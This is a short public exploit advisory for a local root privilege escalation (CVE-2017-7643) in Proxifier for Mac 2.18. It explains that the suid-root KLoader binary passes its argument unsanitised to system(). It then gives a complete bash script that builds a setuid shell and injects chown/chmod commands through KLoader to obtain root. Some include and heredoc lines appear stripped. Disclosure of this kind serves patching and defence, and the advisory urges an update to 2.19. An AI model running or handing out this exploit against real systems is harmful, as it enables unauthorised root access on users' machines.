Proxifier 2.18 Privilege Escalation / Code Execution

`Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with   
a KLoader binary which it installs suid root the first time Proxifier is   
run. This binary serves a single purpose which is to load and unload   
Proxifier's kernel extension.  
  
Unfortunately it does this by taking the first parameter passed to it on   
the commandline without any sanitisation and feeding it straight into   
system().  
  
This means not only can you load any arbitrary kext as a non-root user   
but you can also get a local root shell.  
  
Although this is a bit of a terrible bug that shouldn't be happening in   
2017, Proxifier's developers fixed the issue in record time so that's   
something!  
  
Everyone using Proxifier for Mac should update to 2.19 as soon as   
possible.  
  
https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html  
  
-------------------------------------------------------------------  
  
#!/bin/bash  
  
#####################################################################  
# Local root exploit for vulnerable KLoader binary distributed with #  
# Proxifier for Mac v2.18 #  
#####################################################################  
# by m4rkw #  
#####################################################################  
  
cat > a.c <  
#include  
  
int main()  
{  
setuid(0);  
seteuid(0);  
  
execl("/bin/bash", "bash", NULL);  
return 0;  
}  
EOF  
  
gcc -o /tmp/a a.c  
rm -f a.c  
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel   
/tmp/a ; chmod 4755 /tmp/a'  
/tmp/a  
  
-------------------------------------------------------------------  
  
  
`